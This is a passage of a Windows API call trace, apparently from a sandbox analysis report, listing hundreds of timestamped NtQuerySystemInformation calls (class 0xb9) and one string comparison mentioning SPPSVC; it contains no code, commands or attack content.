SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.729] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0239.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 